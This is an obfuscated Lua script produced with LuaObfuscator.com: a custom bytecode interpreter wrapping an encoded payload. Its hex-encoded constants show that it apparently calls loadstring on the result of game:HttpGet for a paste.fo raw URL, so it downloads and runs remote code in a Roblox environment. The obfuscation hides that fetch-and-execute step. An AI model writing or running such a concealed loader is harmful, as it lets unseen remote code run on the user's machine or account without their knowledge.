--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));return "";end end else local v83=0;local v84;while true do if (v83==0) then v84=v2(v0(v30,16));if v19 then local v101=0;local v102;while true do if (v101==1) then return v102;end if (v101==0) then v102=v5(v84,v19);v19=nil;v101=1;end end else return v84;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v85=927 -(214 + 713) ;local v86;while true do if (v85==(0 -0)) then v86=(v31/((1 + 1)^(v32-1)))%((5 -(3 + 0))^(((v33-(1 -0)) -(v32-((1 + 1) -1))) + (1 -0))) ;return v86-(v86%((1577 -(892 + 65)) -(555 + 64))) ;end end else local v87=((3033 -1761) -(226 + 1044))^(v32-(932 -(857 + 74))) ;return (((v31%(v87 + v87))>=v87) and (569 -(367 + 201))) or (0 -0) ;end end local function v21() local v34=0 -0 ;local v35;while true do if (v34==(350 -((213 -126) + 194 + 69))) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=181 -(67 + 113) ;end if (v34==(1 + 0)) then return v35;end end end local function v22() local v36=0 -0 ;local v37;local v38;while true do if (v36==(952 -(802 + (424 -274)))) then v37,v38=v1(v16,v18,v18 + 2 );v18=v18 + (5 -3) ;v36=1 -0 ;end if (v36==(1 + 0)) then return (v38 * (1253 -(915 + 82))) + v37 ;end end end local function v23() local v39,v40,v41,v42=v1(v16,v18,v18 + 2 + 1 );v18=v18 + 4 ;return (v42 * 16777216) + (v41 * (86188 -20652)) + (v40 * (1443 -(1069 + 118))) + v39 ;end local function v24() local v43=v23();local v44=v23();local v45=2 -1 ;local v46=(v20(v44,1 -0 ,4 + 16 ) * ((3 -1)^(32 + 0))) + v43 ;local v47=v20(v44,812 -((1306 -938) + (1760 -1337)) ,97 -66 );local v48=((v20(v44,50 -(10 + 8) )==1) and  -1) or (3 -2) ;if (v47==(442 -(416 + 26))) then if (v46==(0 -0)) then return v48 * (0 + 0 + 0) ;else local v91=0;while true do if ((0 -0)==v91) then v47=1 -0 ;v45=438 -(145 + 293) ;break;end end end elseif (v47==(2477 -(44 + 386))) then return ((v46==(1486 -(998 + (1347 -(814 + 45))))) and (v48 * ((1 + 0)/(0 + 0)))) or (v48 * NaN) ;end return v8(v48,v47-((4422 -2627) -(11 + 190 + 571)) ) * (v45 + (v46/(2^(1190 -(116 + 1022))))) ;end local function v25(v49) local v50=(1913 -(1789 + 124)) + 0 ;local v51;local v52;while true do if ((887 -(261 + 624))==v50) then v52={};for v92=1 -0 , #v51 do v52[v92]=v2(v1(v3(v51,v92,v92)));end v50=3;end if (v50==1) then v51=v3(v16,v18,(v18 + v49) -((1847 -(745 + 21)) -(1020 + 60)) );v18=v18 + v49 ;v50=1425 -(630 + 273 + 520) ;end if (v50==(9 -6)) then return v6(v52);end if (v50==(0 -0)) then v51=nil;if  not v49 then local v98=0 -0 ;while true do if (v98==(0 + 0)) then v49=v23();if (v49==(0 -0)) then return "";end break;end end end v50=(6856 -5108) -(760 + 987) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 1665 -(970 + 695) ;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();while true do local v67=(function() return 0 -0 ;end)();while true do if (v67==1) then if ((1991 -(582 + 1408))==v53) then v57=(function() return {};end)();v58=(function() return {v55,v56,nil,v57};end)();v59=(function() return v23();end)();v53=(function() return 6 -4 ;end)();end if (v53==0) then local v99=(function() return 0 -0 ;end)();while true do if (v99==1) then v56=(function() return {};end)();v53=(function() return 1;end)();break;end if (v99==(0 -0)) then v54=(function() return function(v156,v157,v158) local v159=(function() return 1824 -(1195 + 629) ;end)();local v160=(function() return;end)();while true do if (v159==(0 -0)) then v160=(function() return 0;end)();while true do if (v160==0) then v156[v157-#"<" ]=(function() return v158();end)();return v156,v157,v158;end end break;end end end;end)();v55=(function() return {};end)();v99=(function() return 1;end)();end end end break;end if (v67~=0) then else if (2==v53) then v60=(function() return {};end)();for v103= #":",v59 do local v104=(function() return 241 -(187 + 54) ;end)();local v105=(function() return;end)();local v106=(function() return;end)();while true do if (v104~=(781 -(162 + 618))) then else if (v105== #"<") then v106=(function() return v21()~=(0 + 0) ;end)();elseif (v105==(2 + 0)) then v106=(function() return v24();end)();elseif (v105~= #"nil") then else v106=(function() return v25();end)();end v60[v103]=(function() return v106;end)();break;end if (v104~=(0 -0)) then else local v154=(function() return 0 -0 ;end)();while true do if (0~=v154) then else v105=(function() return v21();end)();v106=(function() return nil;end)();v154=(function() return 1 + 0 ;end)();end if (v154~=1) then else v104=(function() return 1;end)();break;end end end end end v58[ #"19("]=(function() return v21();end)();v53=(function() return 1639 -(1373 + 263) ;end)();end if (v53~=3) then else for v107= #"[",v23() do local v108=(function() return v21();end)();if (v20(v108, #"{", #"{")==0) then local v142=(function() return 1000 -(451 + 549) ;end)();local v143=(function() return;end)();local v144=(function() return;end)();local v145=(function() return;end)();local v146=(function() return;end)();while true do if (v142~=(0 + 0)) then else local v166=(function() return 0 -0 ;end)();while true do if (v166~=(1 -0)) then else v142=(function() return 1385 -(746 + 638) ;end)();break;end if (v166==0) then v143=(function() return 0;end)();v144=(function() return nil;end)();v166=(function() return 1;end)();end end end if (v142==2) then while true do if (v143==0) then local v168=(function() return 0 + 0 ;end)();local v169=(function() return;end)();while true do if ((0 -0)~=v168) then else v169=(function() return 341 -(218 + 123) ;end)();while true do if (v169==(1582 -(1535 + 46))) then v143=(function() return  #"}";end)();break;end if (v169==(0 + 0)) then v144=(function() return v20(v108,1 + 1 , #"xxx");end)();v145=(function() return v20(v108, #"http",6);end)();v169=(function() return 1;end)();end end break;end end end if ( #">"==v143) then local v170=(function() return 0;end)();local v171=(function() return;end)();while true do if (v170==(560 -(306 + 254))) then v171=(function() return 0 + 0 ;end)();while true do if (0==v171) then v146=(function() return {v22(),v22(),nil,nil};end)();if (v144==0) then local v177=(function() return 1467 -(899 + 568) ;end)();local v178=(function() return;end)();while true do if (v177==0) then v178=(function() return 0;end)();while true do if (v178==0) then v146[ #"91("]=(function() return v22();end)();v146[ #".dev"]=(function() return v22();end)();break;end end break;end end elseif (v144== #"]") then v146[ #"asd"]=(function() return v23();end)();elseif (v144==(2 + 0)) then v146[ #"asd"]=(function() return v23() -((4 -2)^16) ;end)();elseif (v144== #"19(") then local v185=(function() return 603 -(268 + 335) ;end)();local v186=(function() return;end)();while true do if (v185~=0) then else v186=(function() return 290 -(60 + 230) ;end)();while true do if (v186==0) then v146[ #"nil"]=(function() return v23() -((574 -(426 + 146))^16) ;end)();v146[ #"0313"]=(function() return v22();end)();break;end end break;end end end v171=(function() return 1 + 0 ;end)();end if (v171~=1) then else v143=(function() return 2;end)();break;end end break;end end end if (v143==2) then local v172=(function() return 1456 -(282 + 1174) ;end)();local v173=(function() return;end)();while true do if (v172~=(811 -(569 + 242))) then else v173=(function() return 0 -0 ;end)();while true do if (v173~=(0 + 0)) then else if (v20(v145, #"|", #":")== #" ") then v146[1026 -(706 + 318) ]=(function() return v60[v146[2]];end)();end if (v20(v145,1253 -(721 + 530) ,1273 -(945 + 326) )~= #">") then else v146[ #"91("]=(function() return v60[v146[ #"91("]];end)();end v173=(function() return 1;end)();end if (v173==1) then v143=(function() return  #"19(";end)();break;end end break;end end end if (v143== #"nil") then if (v20(v145, #"-19", #"xnx")== #"\\") then v146[ #"asd1"]=(function() return v60[v146[ #".dev"]];end)();end v55[v107]=(function() return v146;end)();break;end end break;end if (v142~=(2 -1)) then else local v167=(function() return 0;end)();while true do if (v167==(1 + 0)) then v142=(function() return 702 -(271 + 429) ;end)();break;end if (0~=v167) then else v145=(function() return nil;end)();v146=(function() return nil;end)();v167=(function() return 1 + 0 ;end)();end end end end end end for v109= #"[",v23() do v56,v109,v28=(function() return v54(v56,v109,v28);end)();end return v58;end v67=(function() return 1501 -(1408 + 92) ;end)();end end end end local function v29(v61,v62,v63) local v64=v61[1];local v65=v61[2];local v66=v61[1089 -(461 + 625) ];return function(...) local v68=v64;local v69=v65;local v70=v66;local v71=v27;local v72=(377 + 912) -(993 + 295) ;local v73= -(1 + 0);local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v88=0 + 0 ,v76 do if (v88>=v70) then v74[v88-v70 ]=v75[v88 + 1 ];else v78[v88]=v75[v88 + 1 + 0 + 0 ];end end local v79=(v76-v70) + 1 + 0 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1 + 0 ];if (v81<=(532 -(406 + 123))) then if ((v81<=1) or (2874<=2181)) then if ((v81==(1769 -(1749 + 20))) or (2689<=343)) then local v110=0;local v111;local v112;while true do if ((v110==(1 + 0 + (0 -0))) or (1869==2009)) then v78[v111 + 1 ]=v112;v78[v111]=v112[v80[4]];break;end if (v110==(1322 -(1249 + 73))) then v111=v80[2];v112=v78[v80[2 + 1 ]];v110=1146 -(466 + 679) ;end end else local v113;local v114,v115;local v116;local v117;v78[v80[4 -2 ]]={};v72=v72 + (2 -1) ;v80=v68[v72];v78[v80[1902 -(106 + 1794) ]]=v63[v80[1 + 2 ]];v72=v72 + (2 -1) ;v80=v68[v72];v78[v80[2]]=v63[v80[1 + 2 ]];v72=v72 + (2 -1) ;v80=v68[v72];v117=v80[5 -3 ];v116=v78[v80[117 -(4 + 110) ]];v78[v117 + (585 -(57 + (2078 -(1126 + 425)))) ]=v116;v78[v117]=v116[v80[4]];v72=v72 + (1428 -(41 + (1791 -(118 + 287)))) ;v80=v68[v72];v78[v80[105 -(17 + 86) ]]=v80[3 + (0 -0) ];v72=v72 + (1 -0) ;v80=v68[v72];v117=v80[5 -(1124 -(118 + 1003)) ];v114,v115=v71(v78[v117](v13(v78,v117 + ((488 -321) -(122 + 44)) ,v80[5 -2 ])));v73=(v115 + v117) -(3 -2) ;v113=0 + 0 ;for v147=v117,v73 do v113=v113 + 1 + 0 ;v78[v147]=v114[v113];end v72=v72 + (1 -0) ;v80=v68[v72];v117=v80[67 -(30 + 35) ];v78[v117]=v78[v117](v13(v78,v117 + 1 + (377 -(142 + 235)) ,v73));v72=v72 + (1258 -(1043 + 214)) ;v80=v68[v72];v78[v80[(31 -24) -5 ]]();v72=v72 + (1213 -(323 + 889)) ;v80=v68[v72];do return;end end elseif (v81==2) then v78[v80[5 -3 ]]=v63[v80[583 -(361 + 219) ]];else v78[v80[322 -(53 + 267) ]]=v80[3];end elseif (v81<=5) then if (v81==(1 + 3)) then do return;end else local v136=v80[415 -(15 + 398) ];local v137,v138=v71(v78[v136](v13(v78,v136 + (983 -(18 + 210 + 754)) ,v80[11 -8 ])));v73=(v138 + v136) -((978 -(553 + 424)) + 0) ;local v139=0 + 0 ;for v150=v136,v73 do v139=v139 + (851 -(20 + (1569 -739))) ;v78[v150]=v137[v139];end end elseif (v81<=6) then local v140=v80[2 + 0 ];v78[v140]=v78[v140](v13(v78,v140 + 1 + 0 ,v73));elseif (v81==(133 -(116 + 10))) then v78[v80[1 + 1 ]]={};else v78[v80[740 -(538 + 4 + 196) ]]();end v72=v72 + (1 -0) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403213Q00682Q7470733A2Q2F70617374652E666F2F7261772F61623833613264626661623500094Q00017Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
